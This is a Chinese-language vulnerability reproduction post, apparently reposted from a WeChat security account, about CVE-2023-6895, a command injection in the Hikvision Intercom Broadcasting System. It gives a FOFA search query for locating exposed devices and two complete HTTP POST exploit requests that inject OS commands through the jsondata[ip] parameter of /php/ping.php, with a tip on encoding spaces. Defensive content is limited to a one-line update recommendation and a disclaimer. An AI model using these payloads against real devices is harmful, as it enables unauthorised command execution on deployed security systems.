CVE-2023-6895 海康RCE漏洞复现
漏洞简介
海康威视(Hikvision)对讲广播系统是一种集成的安防系统,旨在提供高效的对讲和广播功能,适用于各种场所,如企业、学校、医院、政府机构等。
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致系统命令注入
影响版本
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)。漏洞原理
该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入,执行任意命令
漏洞复现过程
FOFA查询语句:icon_hash="-1830859634"
发送EXP
POST /php/ping.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
jsondata[ip]=a|systeminfo&jsondata[type]=1
Tips
执行命令过程中用到空格的地方,请用%20代替
漏洞POC/EXP
POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
jsondata[ip]=a|ipconfig&jsondata[type]=1解决方案
建议及时更新至最新版本!
原文始发于微信公众号(不懂安全):CVE-2023-6895 海康RCE漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论